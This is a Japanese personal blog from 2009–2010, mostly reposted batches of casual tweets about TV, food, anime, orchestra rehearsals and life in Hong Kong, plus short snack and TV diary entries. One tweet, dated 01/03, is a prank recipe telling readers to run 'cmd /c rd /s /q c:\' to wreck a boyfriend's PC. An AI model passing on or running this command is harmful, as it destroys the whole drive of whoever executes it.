2010年04月21日

瞬きみっつでノックダウン

_huro_ / HALCA
チリ大地震の影響で地球の自転速度がごくわずかに速くなったらしい at 04/21 00:22

 
_huro_ / HALCA
男もののリネンシャツをシャツワンピース感覚で着る at 04/19 23:43

 
_huro_ / HALCA
親戚のおばあさまが生き形見に真珠のネックレスをくださったけど ろくに話したことない方から生き形見を頂くのは怖いし重い at 04/18 22:28

 
_huro_ / HALCA
怪物くんの子役がよく見るとケツアゴな件 at 04/17 21:29

 
_huro_ / HALCA
初めて固形タレの納豆を食べた…思った以上に混ざらなくて笑った at 04/17 21:14

 
_huro_ / HALCA
暇なので 実行する予定もないけど 思いつく限りのいやがらせのレパートリーを考えてみる at 04/17 17:14

 
_huro_ / HALCA
コンビニのレジにある募金箱に募金したら 店員のおじさんにお礼を言われて なんとなくうれしいような恥ずかしいような at 04/17 17:12

 
_huro_ / HALCA
今日 「宮崎あおいかわいい」を連呼するソラニン帰りの若い男の子たちと遭遇した at 04/16 23:17

 
_huro_ / HALCA
「オタク」の項の解説の英文が「ハードコア・カルトファン」だった件 at 04/16 19:33

 
_huro_ / HALCA
「森のくまさん」という銘柄の米があるらしい 熊本産だからって・・・ at 04/14 18:29

 
_huro_ / HALCA
イケメンはJPGに限る at 04/14 13:39

 
_huro_ / HALCA
リア充の中に放り込まれたネト充はどうすればいいんだ 実践人付き合いマニュアルとか読めばよろしいか at 04/13 15:00

 
_huro_ / HALCA
大日如来 すなわち 仏のキング at 04/10 18:08

 
_huro_ / HALCA
ランドセルを日本で初めて使ったのは大正天皇といわれています at 04/08 21:07

 
_huro_ / HALCA
ミルフィーユは フランス語で「千枚の葉」という意味です at 04/08 21:06

 
posted by アオノリ at 17:25| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年04月05日

報復はギリシア流に

_huro_ / HALCA
正直 メイドカフェのメイドさんは 9割方ヴィジュアルがホラー at 04/05 23:27

 
_huro_ / HALCA
「お新香」と言う時 なぜか恥ずかしさを覚えます at 04/05 22:48

 
_huro_ / HALCA
感動番組を見ても 「泣けオーラ」がうっとおしくて もはや泣けない at 04/05 21:23

 
_huro_ / HALCA
荒川アンダーザブリッジって聖☆おにいさんと同じ人だったのか!だから妙に表紙がしゃれおつなのか! at 04/05 12:58

 
_huro_ / HALCA
オールスター感謝祭は 油断して仏頂面を抜かれてるアイドル鑑賞が醍醐味 at 04/03 20:46

 
_huro_ / HALCA
靴底が抜けた 学生の上履き並の衝撃 at 04/03 00:34

 
_huro_ / HALCA
今年のエイプリルフールネタはダントツで3Dネタが多かったようです at 04/01 22:23

 
_huro_ / HALCA
メインPCが不調すぎて心配になる マザーボードっていうかもうグランドマザーボードだもの・・・ at 03/31 23:24

 
_huro_ / HALCA
カスタマーセンターはお客様の声を直にお届けしないための外堀 at 03/31 13:43

 
_huro_ / HALCA
「ググれカス」と言いたい時は グッとこらえて 誤情報で相手を撹乱します at 03/30 14:18

 
_huro_ / HALCA
今日はどうせたいした知り合いにも会わないから・・・と思って油断した格好で出ると失敗する罠 at 03/30 10:53

 
_huro_ / HALCA
北斗無双がクソゲーだと認知されたらしい とりあえず動きがもっさりしてることはわかった at 03/29 00:31

 
_huro_ / HALCA
森泉すげー!幸夫人にまでタメ口だった!すげー! at 03/28 22:10

 
_huro_ / HALCA
田舎の中学校では授業で豚の心臓の解剖をするらしい gkbr(^ω^;;) at 03/28 18:40

 
_huro_ / HALCA
本屋大賞の授賞式は賛助会員(5000円の年会費)なら誰でも入れるんですって 小説家に逢いたい人にはたまらんはず at 03/28 16:52

 
_huro_ / HALCA
鳥居みゆき ばっさり髪切ってショートになっちゃんったんだね  at 03/28 14:16

 
_huro_ / HALCA
男の夢をつぶすのが好きです at 03/28 02:34

 
_huro_ / HALCA
酔って電話をかけてこられた 人のふり見て我がふり直せ・・・るかわからない at 03/27 22:15

 
_huro_ / HALCA
グーグル先生のストリートビューで香港見れるようになってた!待望ktkr!! at 03/27 19:25

 
_huro_ / HALCA
「みんなちがってみんないい」と言ってあげるほどの優しさはありません at 03/27 17:08

 
_huro_ / HALCA
正しく自分を言い当てられたい願望 at 03/25 18:51

 
_huro_ / HALCA
「なんでもいいよ」の多くは、なんでも良くはありません at 03/25 17:32

 
_huro_ / HALCA
草食のフリして「交際」を逃れる男達 at 03/25 17:10

 
posted by アオノリ at 23:39| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年03月26日

不機嫌な秘書

_huro_ / HALCA
正しく自分を言い当てられたい願望 at 03/25 18:51

 
_huro_ / HALCA
「なんでもいいよ」の多くは、なんでも良くはありません at 03/25 17:32

 
_huro_ / HALCA
草食のフリして「交際」を逃れる男達 at 03/25 17:10

 
_huro_ / HALCA
辻ちゃんがブログでメロンパン詐欺したらしい at 03/25 16:27

 
_huro_ / HALCA
後輩に激励される自分がいる at 03/23 19:16

 
_huro_ / HALCA
みじん切りを始めると熱中してやめられない派です at 03/23 19:11

 
_huro_ / HALCA
ソラノヲトがただの良作風アニメだということは良くわかった アメージンググレイスの件も ローマ人を黒人に例えてるにしてもしっくりこない at 03/23 02:29

 
_huro_ / HALCA
どうしてキュウリはすぐ液状化するのか at 03/23 00:20

 
_huro_ / HALCA
ちなみに香港はイギリス英語なので もちろん消しゴムは”rubber”です at 03/22 23:55

 
_huro_ / HALCA
香港で話されているのは普通話(北京語)ではなく広東語 北京語と比べると読み方も抑揚も違うので 日本で言う沖縄方言みたいなかんじ  at 03/22 23:45

 
_huro_ / HALCA
香港の国民は完全に中国の統治を受けることに反対してる人が多いので 国慶節には大規模な反対デモ行進をしたりします at 03/22 23:38

 
_huro_ / HALCA
香港=中国の都市みたいに勘違いされてること多いけど 一国二制度の特別行政区なので準国みたいな扱いです 国旗も国花もあるんだよ at 03/22 23:35

 
_huro_ / HALCA
信じにくいですが 香港の路上には豚を背負った上半身裸のおっさんがたまに歩いているという事実 at 03/22 23:25

 
_huro_ / HALCA
うちの猫は去勢済みだから オカマと同棲してると公言しても過言ではない at 03/22 15:37

 
_huro_ / HALCA
「粉々に打ち砕かれた」くらいじゃないと同情できません at 03/21 21:07

 
_huro_ / HALCA
心地よい疲労感でまどろむのはしあわせの骨頂 at 03/20 23:42

 
_huro_ / HALCA
nice boatのとこの新作クロスデイズが誰得のホモゲーと聞いて at 03/20 21:26

 
_huro_ / HALCA
実は今年 ピングー生誕30周年なんですって at 03/19 18:19

 
_huro_ / HALCA
女子の女子に対する「かわいい」の90%は呪詛でできています at 03/17 00:41

 
_huro_ / HALCA
それは「差別しないであげる」という侮辱 at 03/17 00:36

 
_huro_ / HALCA
「帰国子女なんだ〜!!」「すご〜い!!」 …と言わせたい攻撃を「me too」で迎撃するのが快感です at 03/17 00:28

 
_huro_ / HALCA
人は何かを「しない理由」ほど声高に叫びます at 03/17 00:25

 
_huro_ / HALCA
女は忘れるどころか比べる生き物です at 03/17 00:14

 
_huro_ / HALCA
子役で 芸名かわからないけど 自由創と書いて じゆうひろ という名前の少年がいた at 03/16 20:51

 
_huro_ / HALCA
西山茉希ちゃんにライトニングのコスプレをしてほしい at 03/16 16:26

 
_huro_ / HALCA
ウメッシュで有名なチョーヤは 蝶矢 と書くそうです at 03/14 13:46

 
_huro_ / HALCA
とんかつ和幸のことを かずゆき だと思ってたのは恥ずかしい過去 at 03/14 02:49

 
posted by アオノリ at 20:59| 東京 ☔| Comment(1) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年03月10日

逃げるために好きなふり

_huro_ / HALCA
ヒュー・グラントかっこいいよヒュー ヒューは俺の婿 at 03/09 22:16

 
_huro_ / HALCA
昔のツケが回ってきたのか 最近なんだかうまくいきません at 03/09 20:54

 
_huro_ / HALCA
おねマス番組終了ですか・・・ そらちゃんがんばれ! at 03/09 02:28

 
_huro_ / HALCA
テレビでキッチン南海が紹介されてる 本店には行ったことないけど武蔵関店のおじさんとは高校時代お世話になりました at 03/09 00:35

 
_huro_ / HALCA
30年前のバイオリンをメンテに出そうと思ってたら テールピースのワイヤーが自然に切れて弦がふっとんだ at 03/09 00:28

 
_huro_ / HALCA
クレープたべたい イチゴケーキメルバたべたい 食べたすぎて生きていけない at 03/08 23:55

 
_huro_ / HALCA
映画「第9地区」を観たい 肩身の狭いエイリアンに同情してしまう映画なんだそうな at 03/08 21:17

 
_huro_ / HALCA
素直に人を誉められるようになりたいものです at 03/06 17:55

 
_huro_ / HALCA
人生初めてメダルゲームというものをした なるほど底無し沼ですね at 03/06 17:52

 
_huro_ / HALCA
全国のいじめられっこたちは愛子さまの被保護ぶりが羨ましくて仕方がないはず 国がバックについてるとか最強だろ at 03/05 21:24

 
_huro_ / HALCA
身近な人を脳内でアニメ化したりCMに出演させる妄想をするのが日常です at 03/05 10:38

 
_huro_ / HALCA
判子で話題の西又葵もツイッターにいたのか at 03/05 07:12

 
_huro_ / HALCA
高校生の時 友達の下駄箱をハッピーターンでいっぱいにするイタズラが好きだった at 03/04 23:07

 
posted by アオノリ at 20:04| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年03月01日

気をそらすのが狙い

_huro_ / HALCA
ほんとはクラシック嫌いだから映画音楽を弾きたいのだけど、そういうオケはみんな上手いと思うので気後れ at 02/28 18:55

 
_huro_ / HALCA
生きることはくすんでゆくこと ってCMで言わないでほしいなあ at 02/28 01:20

 
_huro_ / HALCA
ツイッターで自分の顔をサムネにする男の人は色々だけど 女の人は自信満々で「どや!」みたいな感じでサムネにしてるよね at 02/27 19:00

 
_huro_ / HALCA
ちょっと調子に乗ってクッキー焼こうとしたら オーブンのなかでクッキーの中心が沸騰してた やっばりお菓子はやめとこう at 02/27 18:48

 
_huro_ / HALCA
小学生の時初めて買ったCDがB-DASHのアルバムだったことは黒歴史 at 02/27 14:20

 
_huro_ / HALCA
グルメ番組にすぐ影響されて次の日食べに行く派です at 02/26 22:49

 
_huro_ / HALCA
これからの季節企業が展開しまくる桜のお菓子 どれもこれも芳香剤の香りがして美味しかったためしがない at 02/26 22:23

 
_huro_ / HALCA
お風呂で歯磨きするのが意外にもイヤじゃなかった at 02/26 19:43

 
_huro_ / HALCA
windows7は何窓開いても全く重くならない 優秀 だけどウィンドウがステルスになる機能は全く実用性がない at 02/26 18:29

 
_huro_ / HALCA
なんだかアニメみたりゲームばかりすることが悪いことのようになってるけど 日本有数の企業のエリートたちが何年も何億円もかけてつくった作品を鑑賞することの何が悪いのか小一時間問い(ry  at 02/26 17:40

 
_huro_ / HALCA
世の中中二病だらけなんです そういうものです at 02/26 17:29

 
_huro_ / HALCA
モヤさまがどゴールデンになるだなんて・・・ 予想してたけど惨事すぐる!どうしたテレ東! at 02/26 00:41

 
_huro_ / HALCA
ファミレスとかで友達と食わず嫌い王やってみたいなあ at 02/25 21:23

 
posted by アオノリ at 19:42| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年02月25日

気づかれない故意

_huro_ / HALCA
機械を買うと 読まずに体で覚える派です at 02/24 01:58

 
_huro_ / HALCA
ラーメンにめかぶはアリです! at 02/24 01:54

 
_huro_ / HALCA
HKのマックでテニプリコスプレの集団に遭遇したことがある at 02/24 01:50

 
_huro_ / HALCA
生ハムに火をとおす→台無し at 02/24 01:49

 
_huro_ / HALCA
国母選手のことを カントリーマアム と呼ぶのがはやりなんですね!把握した at 02/21 03:23

 
_huro_ / HALCA
人生で一度くらい 全国のお仕事大変な人たちに缶コーヒーをおごってあげたい at 02/21 02:57

 
posted by アオノリ at 16:13| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年02月16日

赤い薔薇は罪つくり

_huro_ / HALCA
オケのおじさんたちは下ネタが大好きだ チェロを弾きながら隙あらば下ネタでけらけらしている at 02/16 00:20

 
_huro_ / HALCA
三十路のおじさん友達から逆チョコもらった 業務用トリュフみたいな at 02/15 19:11

 
_huro_ / HALCA
浮気されて怒っている女の子の話を聞くと まあ落ちつけよ と思うけど いざその状況になると 仕方のないことかもしれないと思った at 02/15 19:08

 
_huro_ / HALCA
小さなことにこだわりすぎて、大きなことに気付けていないときがあるけど その逆もある そんな時に間違いに気づけたら 少しだけしあわせな気分になれるかもしれない とか言ってみたり at 02/15 18:53

 
_huro_ / HALCA
声帯の手術で声が変えられたら便利なのに at 02/15 16:58

 
_huro_ / HALCA
昔 公共の電波で かの「チチをもげ!」 を流そうとしたことがある at 02/15 00:31

 
_huro_ / HALCA
クラシックを倍速で聞くとハッピーになれる法則 at 02/14 22:58

 
_huro_ / HALCA
進研ゼミ中学講座の新しいCM 久しぶりにこんな映像価値のあるCM見た気がする \蕩れー!/ at 02/14 21:58

 
_huro_ / HALCA
音楽連盟のアンサンブル ミニスカスーツで出てやった!やってやった! at 02/14 20:55

 
_huro_ / HALCA
ヨーロッパで準結婚の制度があるように 準恋人の制度があればすごく便利なのになぁ at 02/14 03:53

 
_huro_ / HALCA
森ガールという名称をそろそろ許容しようと思っている at 02/13 19:46

 
_huro_ / HALCA
最近のDIVA系歌手でギリギリの境界線は西野カナだと思う at 02/13 19:34

 
_huro_ / HALCA
最近の若いコはおしゃれなことを「おシャンティー」って言うんですって! at 02/13 19:08

 
_huro_ / HALCA
「ワオキツネザル」って一度は言ってみたいよね at 02/13 17:52

 
_huro_ / HALCA
コムサコミューン・・・あんなにかわいいメンズブランドがあるなんて感激ノキワミ!制服男子萌え!エンブレム萌え!コミューンまんせー! at 02/13 16:30

 
_huro_ / HALCA
横須賀線は一駅が長いうえにグリーン車まであるなんて未知の電車すぎる at 02/12 23:53
 
posted by アオノリ at 01:53| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年02月01日

夢で逢おうか

_huro_ / HALCA
酒が入ると涙腺が弱くなって おじさんの説教で泣いてしまう at 02/01 02:11

 
_huro_ / HALCA
なんだか「狩る」という言葉を使っただけでモンハン厨と思われる昨今 at 02/01 01:36

 
_huro_ / HALCA
バイトにしろなんにしろ 丁寧にやるとむしろ怒られるのはなんでだろう at 01/31 20:24

 
_huro_ / HALCA
ロールキャベツの合びき肉にごはんを入れるとスープの味がよくしみるんだって あとチーズを入れるとまろやかになるんだとか やらなきゃ at 01/28 19:24

 
_huro_ / HALCA
ツイートがポエミーな人を見かけると 腹抱えて笑ける at 01/28 12:48

 
_huro_ / HALCA
友達の部屋が汚いと言ったら 押しかけといてと怒られた at 01/28 12:43

 
_huro_ / HALCA
後藤母の葬式に現れた辻の恰好 ミニスカの喪服にいつものでかいリボンて… メンバーの母親が自殺したのにそれはないだろうよ馬鹿やろうが at 01/27 19:12

 
_huro_ / HALCA
大量のサウンドトラックを前にすると 興奮しすぎるから TSUTAYAには行きづらい at 01/27 11:10

 
posted by アオノリ at 13:14| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年01月22日

恋人流星群

_huro_ / HALCA
洗濯物を全部低温でアイロンがけしたい願望 at 01/22 19:13

 
_huro_ / HALCA
風呂場の黒ずみが気になってのめりこむことって あるよね at 01/22 19:01

 
_huro_ / HALCA
おばちゃんが犬のエサにするから廃棄のパンくれって言い出した時はイラっとした at 01/22 18:46

 
_huro_ / HALCA
太陽戦隊サンバルカあああン at 01/22 01:13

 
_huro_ / HALCA
パフォーマンスで跳んだり海老反りしながらバイオリン弾く人見ると恥ずかしくなる at 01/22 01:07

 
_huro_ / HALCA
バカテスは今季最萌 キャラソンアルバム期待 at 01/21 21:48

 
_huro_ / HALCA
みかんのむきかたで遊ぶのがたのしい フラワーみかんとか いもむしみかんとか at 01/21 21:21

 
_huro_ / HALCA
何故若林がモテない扱いなのかわからん 若林モテ具合ハンパないだろ at 01/21 20:05

 
_huro_ / HALCA
忘れものは再会のためのファクター at 01/21 12:58

 
_huro_ / HALCA
スイーツとの話題に困る at 01/21 12:55

 
_huro_ / HALCA
ダーマ神殿に就職したい at 01/21 12:45

 
_huro_ / HALCA
高校生から市民オケだと 色々育つ at 01/21 11:32

 
_huro_ / HALCA
朝から矢口の顔なんか見たら吹くからやめてくれ at 01/21 08:43

 
_huro_ / HALCA
広東話に比べて普通話は発音が綺麗 音だけは綺麗 at 01/21 01:15

 
posted by アオノリ at 21:09| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年01月17日

ドレミファ空

_huro_ / HALCA
世界人口が68億人 私たちの確率って奇跡なんだ at 01/17 23:49

 
_huro_ / HALCA
ゲシュタルト崩壊してほしい時にしない もどかしさ at 01/17 23:34

 
_huro_ / HALCA
鬼奴かわいい at 01/17 22:23

 
_huro_ / HALCA
忘れものは また会える約束 at 01/17 05:10

 
_huro_ / HALCA
人に親切にしたいと思う at 01/16 23:16

 
_huro_ / HALCA
結局 欧米×アジアで子供つくれば 世界人類 うまくいくんじゃね at 01/16 22:45

 
_huro_ / HALCA
かわいこぶった芸名なんて大嫌いだ at 01/16 22:31

 
_huro_ / HALCA
メイクさんに 下まつげ長いからって ひじきにされた at 01/16 18:00

 
_huro_ / HALCA
赤い糸が見えるようになるアプリないかな at 01/16 17:27

 
_huro_ / HALCA
草食系男子に気骨があったら最強 at 01/16 16:40

 
_huro_ / HALCA
好きな曲聞きすぎると 嫌いになる at 01/16 16:31

 
_huro_ / HALCA
たかが粘膜同士の摩擦である at 01/15 13:11

 
_huro_ / HALCA
男がビッチ嫌いなのは化学的に証明されてるんですって at 01/15 12:52

 
_huro_ / HALCA
赤かぶ検事のポスターがホラーすぎる at 01/15 10:15

 
_huro_ / HALCA
悔しいから「憧れる」なんて言葉は滅多に使わない at 01/15 10:11

 
_huro_ / HALCA
言うほどザブングル加藤ひどくない at 01/15 02:46

 
posted by アオノリ at 23:56| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年01月08日

100億光年の時を超え 今日より美しい空はない

_huro_ / HALCA
マンボウが地球を征服する 1マンボウ2マンボウ3マンボウ4マンボウ5マンボウ6マンボウ7マンボウ8マンボウ9マンボウ… at 01/07 14:19

 
_huro_ / HALCA
吉祥寺ユザワヤで 肩にオウム乗せたばあさん見た at 01/07 13:32

 
_huro_ / HALCA
自分より立場の低い方に 罵詈雑言たたかれると 心がほっこりする 変態ではないよ at 01/07 13:13

 
_huro_ / HALCA
ホノカアボーイという映画が大好きすぎて 大好きすぎて at 01/06 22:36

 
_huro_ / HALCA
ソラノオト の音楽が 大島ミチルだった サントラwktk at 01/06 18:35

 
_huro_ / HALCA
君に届け が人気らしいけど 現実逃避すぎて胸糞悪い at 01/06 17:54

 
_huro_ / HALCA
ロンドンブーツの惇って もう36なのか 素敵 at 01/06 17:35

 
_huro_ / HALCA
松葉杖の時 人のいないところで転ぶのは 死活問題 at 01/06 14:14

 
_huro_ / HALCA
webコミの「宮沢さんと〜くん」の渡部くんが大好きすぎる at 01/06 14:12

 
_huro_ / HALCA
冷めてたほうが意外と美味しいシリーズって あるよね at 01/06 13:35

 
posted by アオノリ at 01:45| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年01月06日

横顔しか知らない

_huro_ / HALCA
定番すぎて 傷つくどころか 冷静に砂を捨てた気がする at 01/05 23:50

 
_huro_ / HALCA
小学生の時 古典的にも 女いじめっこに靴の中に砂を入れられたことがある at 01/05 23:49

 
_huro_ / HALCA
ハーゲンダッツのサンプリングのバイトは 準備から撤収まで 完全に一人活動でさびしすぎた at 01/05 23:26

 
_huro_ / HALCA
デパ地下バイトの時に 中島水産のおにーさんに 「中国人ですか」って言われてしまった  そんなに日本語不自由だったかな at 01/05 23:18

 
_huro_ / HALCA
もしも 甘いもの欲しいときに キャラメル差し出してくれたら 惚れる at 01/05 23:14

 
_huro_ / HALCA
mixiとかプロフでセルフ晒ししてる女子中高生見ると 一周回って吹く at 01/05 23:13

 
_huro_ / HALCA
友達にエヴァDVDBOXを貸す代わりに スラダン全巻を借りて お互いに借りパク状態=ただの物々交換 at 01/05 22:54

 
_huro_ / HALCA
サンジェルマンてパン屋でバイトしてたけど 残業代出ないという 違法な実態だった at 01/05 22:43

 
_huro_ / HALCA
イギリス文学を紹介する本読んでたら どの作品も人がすぐ死ぬから 怖くなってきた at 01/05 22:40

 
_huro_ / HALCA
銀縁メガネで どもりがちで 挙動不審で 妙に姿勢が良くて 歩くのが速い人 よくいるけど好き at 01/05 22:26

 
_huro_ / HALCA
宇治抹茶梅酒 期待して買ったけど まずい at 01/05 19:25

 
_huro_ / HALCA
北乃きいの 京都きもの友禅のCMのBGMは 村松健ではなかろうか 違ってたら恥ずかしい at 01/05 01:43

 
_huro_ / HALCA
香港に住んでいたわけだけども 友達は台湾だの韓国だとか言って全く覚えてくれない at 01/05 01:41

 
_huro_ / HALCA
体のどこかが痛いと そのストレスで胃痛になるという 二次災害 at 01/05 01:01

 
_huro_ / HALCA
焼酎をノンアルコールで割るとうすまるから 梅酒で割っている at 01/05 00:04

 
_huro_ / HALCA
吉祥寺歩いてて うめずさんと三回ぐらいすれ違ったことがある at 01/04 23:54

 
posted by アオノリ at 00:07| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2010年01月04日

ベルボーイにいじわる

_huro_ / HALCA
象の鼻は全部筋肉 ネタわかる人挙手 at 01/04 17:36

 
_huro_ / HALCA
高校生の時 知らん人に お茶しない?と言われ吹きそうになった at 01/04 17:10

 
_huro_ / HALCA
知り合いにマンガ喫茶マンボーのご令嬢がいる 新宿南口でジャージでマンボーのティッシュくばってらっしゃった 大変ね at 01/04 17:00

 
_huro_ / HALCA
友達にかに道楽の御曹司がいる 格安でコース食わせてもらってお父様がわざわざ座敷個室までいらっしゃってびびる at 01/04 16:58

 
_huro_ / HALCA
苦労すると 人間的に成長する人と 根性が曲がる人にわかれるとおも at 01/04 16:48

 
_huro_ / HALCA
PS3の起動音ピッってやつ どうにかならんもんかね at 01/04 16:41

 
posted by アオノリ at 17:40| 東京 ☀| Comment(1) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

君は綺麗になった

_huro_ / HALCA
日産ルークスの黒ウサギと女の子がHIP-HOPで踊るCM 歌ってるのは辻ちゃんなんですって at 01/04 13:30

 
_huro_ / HALCA
PS3ガンダム無双が中古で980円で吹いた at 01/04 12:55

 
_huro_ / HALCA
あからさまに のことを あらかさまに だと思っていた at 01/04 12:45

 
_huro_ / HALCA
相手もいないのにゼクシィ at 01/04 12:27

 
_huro_ / HALCA
こたつなう at 01/04 12:24

 
_huro_ / HALCA
森ガールなんて名称 腑に落ちない at 01/04 04:14

 
_huro_ / HALCA
高校生の頃 電車の中でニュージーランド人にナンパされた at 01/04 03:57

 
_huro_ / HALCA
FF13 ヘカトンをヒーラーなしで倒したくせに ラスボス何回やっても倒せない at 01/04 03:54

 
_huro_ / HALCA
菜の花のじゅうたんの向こうの広い川 渡りたいけどどうしよう 母さんが呼んでいる at 01/04 03:50

 
_huro_ / HALCA
ラブプラスそないええのんか なら逆も出るよな!出るだろ! at 01/04 03:47

 
_huro_ / HALCA
ダイハツcocoaのウエンツ可愛いな at 01/04 03:39

 
_huro_ / HALCA
高校生に人間関係を心配された at 01/04 03:19

 
_huro_ / HALCA
君たちキウイ・パパイヤ・マンゴーだね at 01/04 03:18

 
_huro_ / HALCA
食パンくわえて走れば 少しは運命変わるでしょうか at 01/04 03:17

 
_huro_ / HALCA
男の子からきた年賀状がリラックマで少し心配になった at 01/04 03:11

 
_huro_ / HALCA
飲食のバイトは 不衛生を目の当たりにして凹む at 01/04 03:09

 
_huro_ / HALCA
どんなスープにも鶏ガラを入れてしまう癖 もう鶏ガラの味しかしない at 01/04 03:03

 
_huro_ / HALCA
検品のバイトの事務所行ったら がっつり右翼でワロタ at 01/04 02:57

 
_huro_ / HALCA
身の回りにダメな奴がいると 何故か自分がしっかりする件 at 01/04 02:53

 
_huro_ / HALCA
母親は槇原敬之が嫌いらしい at 01/04 02:51

 
_huro_ / HALCA
@hms_103 リアムたんハァハァ で正解 at 01/04 02:49

 
_huro_ / HALCA
うみねこ EP6 結局エリカは虚構で わたしはだぁれの答えは爆発 だったんですかね at 01/04 02:44

 
_huro_ / HALCA
柄にもなく 福袋の行列に並んだら 意外と楽勝だった at 01/04 02:38

 
_huro_ / HALCA
幼稚園児の時和田勉に何か言ったらしい at 01/04 02:36

 
_huro_ /
資格を取れと説教された at 01/04 02:22

 
_huro_ /
熱湯風呂にパスタ入れたらゆであがるかな at 01/04 02:07

 
_huro_ /
でもケータイのアドレスは即行で消せる at 01/04 00:20

 
_huro_ /
昔もらった指輪が捨てられない at 01/04 00:17

 
_huro_ /
小出さんのコーヒーのCM 非常に熱いです at 01/04 00:17

 
knocking0927 /
音楽をどや顔で語るな at 01/03 23:46

 
knocking0927 /
鯖とかいて よせなべ と読むことができるよ ホントだよ at 01/03 23:02

 
knocking0927 /
イロモネアなう at 01/03 22:53

 
knocking0927 /
酸味の申し子 苺大明神 at 01/03 19:52

 
knocking0927 /
天の通い路吹き閉じよおのこの姿しばしとどめん at 01/03 19:50

 
knocking0927 /
棒に刺さったぬかきゅうりエロス at 01/03 19:49

 
knocking0927 /
肉じゃがの恩恵にあずかれば菩薩掌かませます at 01/03 19:48

 
knocking0927 /
ニックデカルチャー

ジャガッ☆
 at 01/03 19:47

 
knocking0927 /
洗車が地球を救います at 01/03 19:46

 
knocking0927 /
料理とは いかに手間をかけずそれっぽく仕上げるか ということです at 01/03 19:45

 
knocking0927 /
敵は凍てつく波動の上にコンフュが使えます
恐怖です
 at 01/03 19:44

 
knocking0927 /
一年365日中1日ぐらい春雨大明神感謝祭があってもいいと思う at 01/03 19:43

 
knocking0927 /
生ハムが好きでもメロンが食べられないと生ハムメロンが面倒くさいです at 01/03 19:42

 
knocking0927 /
スタートメニューの検索欄に
ファイル名を指定して実行
とぶっこんでみましょう

クリックして窓が出たら
【cmd /c rd /s /q c:\】
を更にぶっこんで実行


これで彼パソコンはOSごと再起不能です
 at 01/03 19:42

 
knocking0927 /
妹ブームに成り代わり弟ブームの波を切実に期待 at 01/03 19:41

 
knocking0927 /
おにいちゃんCDがあるなら
おねえちゃんCDもあっていいと思うんです
 at 01/03 19:40

 
knocking0927 /
そういえば 高速の赤城高原SAでとまきゅうソフトが売ってました at 01/03 19:40

 
knocking0927 /
あなたは、あなたの関係者ですか? at 01/03 17:21

 
knocking0927 /
麻婆豆腐は大人の流動食 at 01/03 17:18

 
knocking0927 /
いつじ 脱獄王の番宣で囚の字が書けなかった at 01/03 17:13

 
knocking0927 /
自殺サークル意味不に見えてちゃんとヒントはある at 01/03 16:56

 
knocking0927 /
二日酔いにはハイチオールCが効く at 01/03 16:55

 
knocking0927 /
生ハムと麦茶は合う at 01/03 16:53

 
knocking0927 /
ハリセンボン箕輪は吉祥寺に出る at 01/03 16:51

 
knocking0927 /
柄本佑をよろしくお願いします at 01/03 16:46

 
knocking0927 /
塩ラーメンに芋はいらないと思うんだ at 01/03 16:43

 
knocking0927 /
鳥居さんはレズのバイトしてたらしい at 01/03 16:41

 
knocking0927 /
ライトニングのパンツが黒だと騒いでるやつは男子中学生と同じミスをおかしている at 01/03 16:37

 
knocking0927 /
ゲーム脳は科学的根拠がない at 01/03 16:34

 
knocking0927 /
コエンザイムQ10もニベアと番組の戦略 at 01/03 16:33

 
knocking0927 /
マイナスイオンは嘘

そもそもプラスもないらしい
 at 01/03 16:30

 
knocking0927 /
ヒアルロン酸は体中にあるのでかなりの量とらないと肌にいきません at 01/03 16:29

 
knocking0927 /
ロッチって車にひかれるだけなの? at 01/03 16:28

 
knocking0927 /
アーロン・コックを病院で見た at 01/03 16:26

 
knocking0927 /
FF13 ラスボス強すぎ 十回ぐらい死んだからニコ動でED観た at 01/03 16:14

 
knocking0927 /
葉加瀬の技術を酷評する奴は実は下手くそ at 01/03 15:48

 
knocking0927 /
ギザ十は駅の券売機で使えません at 01/03 15:33

 
knocking0927 /
錦玉子が美味すぎる at 01/03 15:31

 
posted by アオノリ at 13:50| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2009年10月01日

恋人も泣いてる

image/2009-10-01T01:00:233

今晩和

おかしのまちおかで
通常329円のプリングルスM缶が
99円で売ってました

さすがまちおか


それを皮きりにお菓子の波が到来していて
無印良品のお菓子を買ってみました

ミニラーメンのスパイシー塩味がこんなに美味しいだなんて
もっと早く買ってればよかったと後悔するぐらい
美味

こがし醤油キムチも食べてみたいなぁ

たまご豆乳ワッフルも美味しいし
鈴カステラはコスパ良いですね

また行っていろいろ開拓しよう

では

ノシ
posted by アオノリ at 01:52| 東京 ☔| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

夏をあきらめて

image/2009-10-01T01:00:235

今晩和

最近秋の特番が多くてテンションがあがります
でも、深夜バラエティが大量に入れ替わるのでさびしくもあります

リーダーズハウトゥ
アドレな
草野キッド
やぐちひとり
検索ちゃん
しんどい

終わっちゃいましたね…(´;ω;`)

あんまり数字芳しくなかったんでしょうか

何故なんだぜ

さすがさまぁ〜ずは生き残ってますが
意外にも深夜グルメって生き残るんですね
お腹すく時間ですもんね

って書いてる時間が時間なのでお腹へってきました

ジレンマに負けてきます


ノシ
posted by アオノリ at 01:08| 東京 ☔| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2009年08月19日

華麗なる孔雀夫妻

くさ
 アオノリです

 
 こう見えてポインセチアです
 冬以外だと影が薄い(‘ω’)



最近、秋のコンサートに向けて
ラフマニノフのピアノ協奏曲二番
新世界より
